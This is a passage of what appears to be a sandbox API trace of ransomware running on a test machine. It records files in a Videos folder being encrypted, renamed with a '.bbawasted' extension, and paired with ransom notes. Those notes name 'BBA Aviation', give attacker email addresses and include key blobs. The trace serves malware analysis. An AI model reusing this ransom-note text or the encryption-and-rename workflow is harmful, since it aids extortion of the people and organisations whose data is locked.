KEY:\r\n[begin_key]HADBNFLw6KUFmx776ipFmD5SVTL4HaIaj9Hns+94DIx+QQL+YB5hTZYhDnSjytpR\r\nxzxXO3v4pyTv468VoSIZCoxXb1tKAR1HH8enk6HwS/MciWDfwKwi2bPCeVnuqY7M\r\nrP0DQKb/aIX7efucImQAz3oxxP6MeSeQWwl4/Q98A4/5mff9sXLhrw6PEZuKgXbe\r\nyueTlUE8JEDly0pyehEALcB1B3F5fyHYTVTxwpsFVQQ58pQLdgLJlYVcbEm3DQmh\r\ncwVlR3JKlyFLFLAhpAVIo/yaglK/gDSqe4QF48ftlrxA/jJv9IRN0MGhjcbCgB2o\r\nNozIQjG5i9YcXZ9wuZv59pAGZCzABJOOhjmJjuGHz8wZGff8Ft2Oq2TRWYvQaRNN\r\nUQmqLFO8o8WvCVr4H2yjYEwiDp9d4DkZVqvIFtSVSu5pIyKwgsd7HAzQg+ojkUFK\r\nRW8MkMPtnlgm4JzUN3ZbfgCZUK1j3G0mLM+jeCVlt+U/tmVnzW7asKSlL/Tu9ZPj\r\no+hU+KxBp8J0ZfOr9b9gUhlAB+Byra9rnBXVAM+IcZUsbIs4ZMtyy7Fb8cLhkmzN\r\ngv9L6rKUawnHE1D4ZWVSrjHSaVoqxQyC5+F2QbLqyIP4uPKIz6xrya0gAEECzZT0\r\nqyDQSGaWt85x+5UlUlNytZrDVOLcmLzqxoTOgVgsLdw=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.030] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0231.030] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0231.031] SetEndOfFile (hFile=0x28c) returned 1 [0231.033] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.033] CloseHandle (hObject=0x28c) returned 1 [0231.033] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0231.034] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bad60 | out: hHeap=0x660000) returned 1 [0231.034] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a62c8) returned 1 [0231.035] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0231.035] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0231.035] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\9USHkM8p7MBxvB9F.avi") returned 81 [0231.035] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ac) returned 0x6c4b88 [0231.036] lstrcpyW (in: lpString1=0x6c4c2a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.036] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a62c8) returned 1 [0231.037] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0231.037] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0231.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\9USHkM8p7MBxvB9F.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\9ushkm8p7mbxvb9f.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0231.038] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.039] SetEndOfFile (hFile=0x28c) returned 1 [0231.039] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.039] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.039] lstrcpyW (in: lpString1=0x6c4c2a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\9USHkM8p7MBxvB9F.avi" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\9ushkm8p7mbxvb9f.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\9USHkM8p7MBxvB9F.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\9ushkm8p7mbxvb9f.avi.bbawasted")) returned 1 [0231.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\9USHkM8p7MBxvB9F.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\9ushkm8p7mbxvb9f.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0231.040] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0231.040] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xb714 [0231.040] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb714) returned 0x5f0000 [0231.040] CloseHandle (hObject=0x294) returned 1 [0231.042] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.043] CloseHandle (hObject=0x290) returned 1 [0231.043] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0231.043] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0231.043] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0231.043] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0231.043] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a68a0) returned 1 [0231.044] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0231.044] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0231.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0231.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0231.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.053] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]iy9RFLiTmjeMgUlkCyOZ7qWREDHmV5kN8Rw4So5IgdTvH/33/e/G4c9C/QjFar5Q\r\na4B68yPLA0WP6TVPxdvvjO3xriHfweMhHJi6rnqjkCpahmNXDyLAhdSwonhDdp7Q\r\nJ7bzEeSkGB5XHY7HS9B6ZwJLw3mPHNcZCMYrbl4ycAawsKVn7UUU4oLzxRYgXLIp\r\nLs9mUfO3da4cAkJFaWhkAxgWbsUCwoxCVZdme2f0Ge6ICfw5mXjqI5DyKja31A+f\r\nv9vQRasXacnOHUTR2L5UzFlay2kGWYQNo2tawfPtC+GYfILoN4tyUpg/JCEMRW3T\r\n5NusIPsEEiSjbCQ4CrdupQ9eOSELRNYOZ9BTH945yeRNLQ5CMTvdlOsZ8XelSwJj\r\nk0+zc7h6h/8DbaBadHQvzYSGLQ6gR8LUvy4t5VRxVyPyem4p3DH/+bN+cEG1RxEw\r\nmZyixjic4cCSicv7045TsrcjChq+lftv8pa0W8GIL1bmEQHRpBktgdtSfSqQfyTD\r\nzPk0QQ6wGYbDw7k3W0PIa9WxnVmN4PQ91li7Usd0LpHIAL/6NK2czkVHevDgbHHs\r\n1g1Y1wWbTRP1nh/Zf9oFhmbGOb4ZgMWHFr97H7Pk0+YC66Mqt+WhNsySPCfFtC5I\r\nO73HnRGtj+XUqVmQwyTVpVWOhlxSVsBzF/V/ihZyPth=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0231.053] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0231.054] SetEndOfFile (hFile=0x28c) returned 1 [0231.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.056] CloseHandle (hObject=0x28c) returned 1 [0231.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0231.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6298 | out: hHeap=0x660000) returned 1 [0231.056] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a68a0) returned 1 [0231.057] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0231.057] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0231.057] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\JPKbs4zkGW8-.mp4") returned 77 [0231.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a4) returned 0x6c4b88 [0231.057] lstrcpyW (in: lpString1=0x6c4c22, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.270] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.270] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6790) returned 1 [0231.270] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0231.270] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0231.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\JPKbs4zkGW8-.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\jpkbs4zkgw8-.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0231.271] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.272] SetEndOfFile (hFile=0x28c) returned 1 [0231.273] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.273] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.273] lstrcpyW (in: lpString1=0x6c4c22, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\JPKbs4zkGW8-.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\jpkbs4zkgw8-.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\JPKbs4zkGW8-.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\jpkbs4zkgw8-.mp4.bbawasted")) returned 1 [0231.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\JPKbs4zkGW8-.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\jpkbs4zkgw8-.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0231.274] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0231.275] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x11c40 [0231.275] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11c40) returned 0x5f0000 [0231.275] CloseHandle (hObject=0x290) returned 1 [0231.277] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.278] CloseHandle (hObject=0x294) returned 1 [0231.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0231.278] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6570) returned 1 [0231.279] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0231.279] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0231.279] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6680) returned 1 [0231.279] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0231.279] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0231.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0231.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0231.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.288] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dtNHxmd2qn6bP1OTlx19Pjgsj+T0mcpHIB+BV74Aivo4HOTT6IYKcZQEkz2viG80\r\nH94+NWZIu8miuG/d4mAFnAhnqmSkT0ev1hqLMIDTe8adh/fJd2Q1ShkQcRKbz/Sa\r\nNBK5iMBnGLKXYMzdeCAaBNcHYibqyZOPVcGnD08DUKmB45DRnqIbDOSGfhH/AIhl\r\nW7PSIUL4pHZ2cZufcsw2jSWH35Z65liK7O96FwBrAoxCvuHy5P0mjGaFZ8GK3YCZ\r\n0hOBcZOobvJ5gYafMqOpYeM0ni+VeBDas8+O7TuOfeqDFW7PgTEjke6UAjLTllx+\r\nwqdZSXBrENQm1FGaCHZ4vaU2EgOSYVqgTxyvZw3/kH3HP3i1Lv2MBUAvlMQ2veDF\r\nJx8Rdm0VCSphbXJemMhHC9BRAhAeZ/NadrCAkRAL89LPicfN4uNAknYNstXlxPy0\r\nG9JOe5OsQqKUnWphzYfAKt+W4bQKRdKwlxFqeAgsDI3wZlgSjQVGsPhzdGoc1t5i\r\nkWbi6jq+hce1mV4lSjUHmxDDZh4Gu+vjhkrlqo4iDnJCbaGQmLho3NtOseJ/eKmg\r\nw9//f1kGtWmHcv2OrnxYfQDcXo9y9Sh784UZWJSOGkaeDj1E5E9cxIraKbkcMly/\r\nG1nAPUw2pFZ0Eh5QQcGY9ynC+tLNwBFXrnug26bmfpb=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0231.288] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0231.288] SetEndOfFile (hFile=0x28c) returned 1 [0231.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.290] CloseHandle (hObject=0x28c) returned 1 [0231.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0231.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aea00 | out: hHeap=0x660000) returned 1 [0231.291] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0231.291] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0231.291] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0231.291] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\uH-3L.mp4") returned 56 [0231.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6ae850 [0231.292] lstrcpyW (in: lpString1=0x6ae8c0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.292] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6350) returned 1 [0231.293] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0231.293] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0231.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\uH-3L.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\uh-3l.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0231.293] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.294] SetEndOfFile (hFile=0x28c) returned 1 [0231.295] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.295] lstrcpyW (in: lpString1=0x6ae8c0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\uH-3L.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\uh-3l.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\uH-3L.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\uh-3l.mp4.bbawasted")) returned 1 [0231.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\uH-3L.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\uh-3l.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0231.296] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0231.296] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x71b6 [0231.296] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x71b6) returned 0x5f0000 [0231.296] CloseHandle (hObject=0x294) returned 1 [0231.297] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.298] CloseHandle (hObject=0x290) returned 1 [0231.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0231.298] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6240) returned 1 [0231.298] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0231.299] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0231.299] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a69b0) returned 1 [0231.299] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0231.299] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0231.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0231.391] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0231.391] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0231.391] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]cwinNX7dOv7kuDW8TBrsfiIvYW42Yy7GJ2X9lXRR9oZKu/XDa905K8UwOyaJ4pJE\r\nG4TjinWHhVbc9C8YOw3DT/ebxoYESIzz7/IwTfXxa0EFFqCUfxj7ErPtZafKxBit\r\nL1kT4h2srYJNUDnDXXta6xF2/H8cSFJG27dTs46o5xX0CuA1fjn26ZmMVa+/0Vdn\r\nYPU1yLt9Q0tx9JZhrOln+pVRnfTzf059svE0MJPhw/+0Nia/CcuNXm6Escs7Y0Ad\r\n1WF1+hvuSpIOcHFgloIv5TKo0FTfZ3mNUR6qslCtbGTnJUkxkfNarKOYk/7dLJtI\r\ng+RQYraEo96/fDGBiidDccE2X1GD2hgIcRE1a70IYGItyYMAD7kyI2qsfcQSvB7T\r\nBHxPutiVeZuxsLduYpUAsSVuCqCKBI9mBfnRwW0Mx/aFC0H4qV/JO3rF0MGqKn7r\r\nuLbhLVdt/Bhhkg2XmCAX/Td5gCz/PL1nfF3WARfdqXL5w+/lgHlrFLdWJCIvgc+q\r\nEB1SMxTJaCDUAbnNxUBFy6ji6Fiat6xoHhXJTdMTbFDou7qA7OmvQ+9fbs9bBbMb\r\nq420MW0xAnZmmvyHE4wGOAgW7PhUlPN7G5DYmQlN85p+8Mxg1lhY8TsBhGWIBJeC\r\nOiKVTVqkXEB2H+YMVxhTTlkcw2SaPU40jw/nIY6E7tu=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.391] HeapFree (in: hHeap=0x660000, 